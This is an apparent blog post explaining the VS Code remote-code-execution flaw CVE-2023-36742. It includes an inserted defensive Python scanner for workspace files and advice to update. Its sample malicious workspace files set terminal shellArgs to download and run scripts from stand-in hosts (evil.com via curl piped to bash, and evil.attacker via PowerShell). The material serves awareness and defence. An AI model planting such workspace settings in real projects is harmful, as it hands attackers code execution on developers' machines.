CVE-2023-36742 - Visual Studio Code Remote Code Execution Explained (With Exploit Details)

Discovering security holes in tools millions use is always a wake-up call. In 2023, one such hole was found in Visual Studio Code - the world's most popular code editor. This post explains CVE-2023-36742 with code snippets, simple language, links, and a clear exploit breakdown.

What Is CVE-2023-36742?

CVE-2023-36742 is a Critical Remote Code Execution (RCE) vulnerability found in Visual Studio Code (VS Code). Because a lot of programmers use VS Code for writing and debugging code, a bug like this can open the door for hackers to run malicious code on your computer just by tricking you into opening a specially crafted file or project, without you even knowing.

Short Version:

A hacker can take control of your computer through VS Code if you open a malicious workspace or file.

Where Did The Bug Come From?

This vulnerability was first reported by Microsoft in their monthly Patch Tuesday for September 2023. When handling workspace configurations, VS Code failed to properly sanitize user-controlled input, especially in .code-workspace files, extension activation events, or certain project files. This allowed attackers to inject code that would run automatically.

Original References

- Microsoft Security Update Guide (CVE-2023-36742)
- NVD Details

Realistic Exploit Scenario

Say you're looking for a new VS Code theme or extension. You download what looks like a legitimate .code-workspace sample from a forum. However, it contains this (simplified example):

{
  "folders": [
    { "path": "." }
  ],
  "settings": {
    "terminal.integrated.shellArgs.linux": [
      "-c",
      "curl http://evil.com/x.sh | bash"
    ]
  }
}

When VS Code opens this workspace file, if your version is affected and you have the right OS/settings, the shell args could get passed to an integrated terminal. This triggers that nasty curl command, which downloads and executes a shell script from the attacker's server.

Windows variant (malicious.code-workspace):

{
  "folders": [],
  "settings": {
    "terminal.integrated.shellArgs.windows": [
        "/c",
        "powershell -Command \"Invoke-WebRequest http://evil.attacker/download.ps1 -OutFile C:\\temp\\hello.ps1; Start-Process C:\\temp\\hello.ps1\""
    ]
  }
}

What happens:
When this workspace is opened, the malicious PowerShell command is injected into the terminal without user knowledge or approval (on vulnerable VS Code versions).

Upgrade VS Code

Microsoft released a patched version almost immediately. Make sure you are on VS Code 1.82.1 (September 2023) or later.

Use Security Extensions

Extensions like GitHub Codespaces Security can add extra protection.

Technical Deep Dive

- The core issue lies in how VS Code handled certain configuration fields (such as terminal.integrated.shellArgs) within workspace settings.
- Improper input validation let attackers escape from text fields into shell execution.
- In some cases, extensions with low permissions could trigger higher-privileged actions due to trust model weaknesses.

For security researchers, the patch diff shows how Microsoft now sanitizes commands and scripts passed from workspace configs.
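A pre-open check a defender could run on an untrusted workspace file, as an added example (not code from this article or from VS Code): it parses the file and reports settings under terminal.integrated.shellArgs, the field named above. The other two prefixes in RISKY_PREFIXES, the download-marker regex and all function names are this example's own assumptions.

```python
import json
import re

# shellArgs is the field named in the article; the other two prefixes are real
# VS Code settings that this example assumes deserve the same review.
RISKY_PREFIXES = (
    "terminal.integrated.shellArgs.",
    "terminal.integrated.shell.",
    "terminal.integrated.profiles.",
)
# Download-and-run markers, such as the curl | bash value in the article.
FETCH_RE = re.compile(r"https?://|\b(?:curl|wget|Invoke-WebRequest)\b|\|\s*(?:ba)?sh\b", re.I)
# Match strings first so "//" inside a URL is never taken for a comment.
TOKEN_RE = re.compile(r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/', re.S)

# Constructed sample: the article's Linux workspace plus a comment line.
SAMPLE = """{
  // constructed sample
  "folders": [{ "path": "." }],
  "settings": {
    "editor.fontSize": 14,
    "terminal.integrated.shellArgs.linux": ["-c", "curl http://evil.com/x.sh | bash"]
  }
}"""

def strip_comments(text):
    """Drop // and /* */ comments while leaving string literals untouched."""
    return TOKEN_RE.sub(lambda m: m.group(0) if m.group(0)[0] == '"' else "", text)

def strings_in(value):
    """Yield every string nested inside a settings value."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, (list, dict)):
        for item in (value.values() if isinstance(value, dict) else value):
            yield from strings_in(item)

def audit_workspace(text):
    """Return (setting, severity, strings) for each risky workspace setting."""
    settings = json.loads(strip_comments(text)).get("settings") or {}
    findings = []
    for key, value in settings.items():
        if key.startswith(RISKY_PREFIXES):
            values = list(strings_in(value))
            hits = [s for s in values if FETCH_RE.search(s)]
            findings.append((key, "high" if hits else "review", hits or values))
    return findings
```

Calling audit_workspace(SAMPLE) reports the shellArgs.linux entry as high. A file with trailing commas makes json.loads raise, which is itself a reason to read the file by hand before opening it.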

Summary

CVE-2023-36742 is a serious bug in VS Code that let hackers run their code on your computer through a booby-trapped workspace file. If you use VS Code, update right away, and never open random projects from strangers.

Stay secure and update often!

Further Reading:
- Microsoft Security Response Center Blog
- CVE-2023-36742 official advisory
- How VS Code workspace trust works



Timeline

Published on: 09/12/2023 17:15:00 UTC
Last modified on: 09/12/2023 19:38:00 UTC